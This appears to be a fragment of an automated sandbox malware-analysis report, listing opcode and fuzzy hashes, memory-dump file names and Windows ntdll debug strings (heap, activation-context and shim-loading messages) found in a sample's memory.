                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dae5d692f54c47b84c27089e5e8095bef10636fc8dad2e9237fc3eab63775a4a
                                        • Instruction ID: 70f76a8cb68cdac63e5149358b0aff76e7caac261c2a85108b3efc8617934b6a
                                        • Opcode Fuzzy Hash: dae5d692f54c47b84c27089e5e8095bef10636fc8dad2e9237fc3eab63775a4a
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb89436df6c29d472e8805470e6165afa0804c51fd714a913e37d6ec3f203006
                                        • Instruction ID: 21e007017c31b937c1c53a77c6f47be3671e5d3316593b2e82fe3aabb7bb4c37
                                        • Opcode Fuzzy Hash: bb89436df6c29d472e8805470e6165afa0804c51fd714a913e37d6ec3f203006
                                        • Instruction Fuzzy Hash: 5301A27A504241DBC311CF7DDA14951BBECFB6D21C714056DE409D7B15DE32E902C755
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ff81dc47effcc7c20b7a62cc747cfdad1445d199382a1fa9b4f5a94b4c79075
                                        • Instruction ID: 402605b7820de9f4573e853bcda74acf7ce3b82ffe1350ce5b3d8187218692c2
                                        • Opcode Fuzzy Hash: 1ff81dc47effcc7c20b7a62cc747cfdad1445d199382a1fa9b4f5a94b4c79075
                                        • Instruction Fuzzy Hash: B5018F71A00318EFD714DBA9D845FAEBBB8EF84744F10446AF900EB281DAB4D901C794
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1399541195005eb8d45767aa9168309072acdad0e71ed7d8c0e42f3232c765b7
                                        • Instruction ID: f76dac24a25486632d2423f48f1b84f4c824bfc23a80576657adad47d9cb46f1
                                        • Opcode Fuzzy Hash: 1399541195005eb8d45767aa9168309072acdad0e71ed7d8c0e42f3232c765b7
                                        • Instruction Fuzzy Hash: BBF0F932A01B64ABD335DF5B8D40F577BADEBC8B90F104028AA0997240CA60EC01D6A0
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                        • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                        • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                        • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d1919354b3fbadccfa7bd16229051913357f13ef5f83284267d510e9ae02979
                                        • Instruction ID: 22dba40133ea48850650e9a3a3d39ca0b7a6fb67f08a4e42474a667de66db770
                                        • Opcode Fuzzy Hash: 7d1919354b3fbadccfa7bd16229051913357f13ef5f83284267d510e9ae02979
                                        • Instruction Fuzzy Hash: F2116D78E10259EFCB04DFA9D540A9EB7B4EF08704F14845AF915EB341E774DA02CB54
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                        • Instruction ID: 9f2fc65089612a7a2a31fdcf33d3a759b37ba512b808587e5b2132dbc516f467
                                        • Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                        • Instruction Fuzzy Hash: 57F0C87324072A9BD332469D4840B5765999FC9F60F154035A505ABB01CDA0CC029AD4
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d05225241e1edbe46317d25d36d86527065de395f8a01bd1b526b56c515e18d
                                        • Instruction ID: 319bdccb7ac24405a4a62031cadd8225df84926e7c075cc1dd76c17d6c7ea92b
                                        • Opcode Fuzzy Hash: 3d05225241e1edbe46317d25d36d86527065de395f8a01bd1b526b56c515e18d
                                        • Instruction Fuzzy Hash: 54111B74A00249DFDB04DFA9D541B9DFBF4BF08304F1446AAE519EB382E674D941CB90
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                        • Instruction ID: 610223ce265fe050028facf9aae78b053e08e6589fd8c4a50873465477389b32
                                        • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                        • Instruction Fuzzy Hash: 45F022B3A01214BFE309CF9CC840F5AB7ECEB46754F014069E900DB231EA71DE04CA94
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a825c052acdd13e1fc024c5d42176cd8e7f46cb661ca458835d3779318437279
                                        • Instruction ID: 98cb9d88d8232fdeb3d01494a816bb2caafe89d36b57e43f5a1b883c33596436
                                        • Opcode Fuzzy Hash: a825c052acdd13e1fc024c5d42176cd8e7f46cb661ca458835d3779318437279
                                        • Instruction Fuzzy Hash: 01010CB4E00709AFDB04DFA9D545A9EB7F4BF08744F10846AB915EB341EA74DA00CB91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9b8892f7d84c78e1b0d398039aa686ec3c0c007f2b37a60fe0a6a0bce6c084e
                                        • Instruction ID: 9586cd9dfbe6763dc2ad62b6c3612e9c9dd1f8ad459388089eba7c44b3b3d83c
                                        • Opcode Fuzzy Hash: f9b8892f7d84c78e1b0d398039aa686ec3c0c007f2b37a60fe0a6a0bce6c084e
                                        • Instruction Fuzzy Hash: A3F0F6366416846FC621BFB5AE64F2A3659FFC0F68F51042DBA010F19ACDA4DC01CBA0
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7df049fa756f906b94a5bc57624c8494ffc430b7bdf4873704c32d4418b3234d
                                        • Instruction ID: cf776aa8849f5d3a071946bca7db41558500e926f8ceb18ea08ea4bab33ff9a5
                                        • Opcode Fuzzy Hash: 7df049fa756f906b94a5bc57624c8494ffc430b7bdf4873704c32d4418b3234d
                                        • Instruction Fuzzy Hash: FFF0A471B00318AFD704DBB9C405A9EB7B8EF44714F1084AAF510FB281DAB4D9058751
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6efa241b87c58dad49a4834f9eac0c88298f684dcb61b99fddb893a51b6b02b
                                        • Instruction ID: 9766b4fb028f2892e17fe8bd84a6ddd89a81c0456affea4eea3b410baec9ae2a
                                        • Opcode Fuzzy Hash: e6efa241b87c58dad49a4834f9eac0c88298f684dcb61b99fddb893a51b6b02b
                                        • Instruction Fuzzy Hash: D4F0F07664435A5AF614AA098D00F2272AAE780761F21C02AEA058F2D2EEB2D801CA54
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                        • Instruction ID: b248eacdeca71514039dff65ba8e420a857780b910ab355ef5e2060270bccb83
                                        • Opcode Fuzzy Hash: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                                        • Instruction Fuzzy Hash: 91F06272A00708BFE711DB64CC41FEAB7FCEB44714F104566B956D7181EAB0EA40CB94
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 871d4b5470fb4ae2a8d2bec16dd1d27f23a16b5ff51caec30720409e9d644b96
                                        • Instruction ID: c53725fa92fbbd3aaf2614b809963deb74b16839f324c8bdf1780db3ae66938c
                                        • Opcode Fuzzy Hash: 871d4b5470fb4ae2a8d2bec16dd1d27f23a16b5ff51caec30720409e9d644b96
                                        • Instruction Fuzzy Hash: 13F04F74A00348EFDB04DFA8D545A9EB7F4EF08304F508469F905EB381EA74DA01CB54
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                        • Instruction ID: a21b15c3f7aa7063832be601baee7f0066a590489231c3f26e3269e0fe72fa2d
                                        • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                        • Instruction Fuzzy Hash: F1F0BE72614208AFE328CF21CC45F96B3EDEF98754F2580789904D72A0FEB1DE00CA15
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d04f5049f775a08956cb8700270c5529a8456421db6cc4eb7384eb5e42296e9
                                        • Instruction ID: 769c4965430b16a49b0415ffa42e6559f431844c46cc126f77e84757f529a784
                                        • Opcode Fuzzy Hash: 4d04f5049f775a08956cb8700270c5529a8456421db6cc4eb7384eb5e42296e9
                                        • Instruction Fuzzy Hash: DEF090B5A00358EFDB08DFA9D545E9EB7F8AF08304F1044A9B901EB385EA74D901CB94
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9daf8aed6cbd4bbb0efbe4bad1723a69a9a28e11a672fc79d47581bea9931983
                                        • Instruction ID: d8d673774a0dfaebda1d1ecd1d90a76390a460dbe5a93d64e25f7eae00e544a3
                                        • Opcode Fuzzy Hash: 9daf8aed6cbd4bbb0efbe4bad1723a69a9a28e11a672fc79d47581bea9931983
                                        • Instruction Fuzzy Hash: 40F02EB990139CCEE7218326C104B4177FC9F0B7B4F48B8AAC8298F512CB60F884C250
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f1ab25f4dfeba072f083492d05a19c2fef340555cb53dd740ecd5b2be464dff
                                        • Instruction ID: 98028108d01b50e2f601fbd6e63e508c05b4c441a029b1d662b4268036542f13
                                        • Opcode Fuzzy Hash: 5f1ab25f4dfeba072f083492d05a19c2fef340555cb53dd740ecd5b2be464dff
                                        • Instruction Fuzzy Hash: A2F0E270A00308AFCB08CBA8C456A8E77F8AF08304F100099F601EB285D974D901C758
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51056deac91513d74bd8c1a742e9b7504321ce3e2101af4fa8b2baea65bfc143
                                        • Instruction ID: 805cedacd5452508bc7761453904ddadf7b2505bcdcfce3cda41ac8438494642
                                        • Opcode Fuzzy Hash: 51056deac91513d74bd8c1a742e9b7504321ce3e2101af4fa8b2baea65bfc143
                                        • Instruction Fuzzy Hash: 21F08270A40348AFDB04DBB9D555F9E77F8AF48708F504498F501EB285EA74D901C758
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33d63a34f3943c2fbd32efc6250038ce03d37586d235179c6b9bd10e334b47db
                                        • Instruction ID: 7a08a035debb6a65bb20da915dd58474783b92f3d1ee26e7a6b506ab95a1db1f
                                        • Opcode Fuzzy Hash: 33d63a34f3943c2fbd32efc6250038ce03d37586d235179c6b9bd10e334b47db
                                        • Instruction Fuzzy Hash: E1F0A775D11754DFEB12D725D344B4177DCAF45BB4F0E9066D8198B902C774DD80C690
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3713dc35858d982483695ae323458d189e7cc015c44949f0b5643b97620199a0
                                        • Instruction ID: 7de7d938706acc928fff6349a5e67ac75521650f9c088a4a51292d741a30901b
                                        • Opcode Fuzzy Hash: 3713dc35858d982483695ae323458d189e7cc015c44949f0b5643b97620199a0
                                        • Instruction Fuzzy Hash: 2390026160120042458071585A04416605567E1319391C55AA0644520CC62C885DA26A
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction ID: d8981b4ab7e4887fd2b31c1fa5c5ba18c6beff09c55635fd63bbddaed578cfa4
                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction Fuzzy Hash:

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: HEAP:

                                        Control-flow Graph

                                        Strings
                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 32984592
                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32984507
                                        • ExecuteOptions, xrefs: 329844AB
                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3298454D
                                        • Execute=1, xrefs: 3298451E
                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32984460
                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32984530

                                        Control-flow Graph

                                        Strings
                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 329777DD, 32977802
                                        • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 329778F3
                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 329777E2
                                        • Actx , xrefs: 32977819, 32977880
                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32977807
                                        • SsHd, xrefs: 3292A304

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32979372
                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 3297914E, 32979173
                                        • GsHd, xrefs: 3292D794
                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32979153
                                        • Actx , xrefs: 32979315
                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32979178
                                        Similarity
                                        • API ID: DebugPrintTimes

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32969843
                                        • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32969885
                                        • LdrpLoadShimEngine, xrefs: 3296984A, 3296988B
                                        • minkernel\ntdll\ldrinit.c, xrefs: 32969854, 32969895
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                        • API String ID: 3446177414-3589223738
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                        • API String ID: 3446177414-3224558752
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                        • API String ID: 3446177414-1222099010
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: $$@
                                        • API String ID: 3446177414-1194432280
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                        • API String ID: 3446177414-3610490719
                                        APIs
                                        Strings
                                        • Failed to allocated memory for shimmed module list, xrefs: 32979F1C
                                        • LdrpCheckModule, xrefs: 32979F24
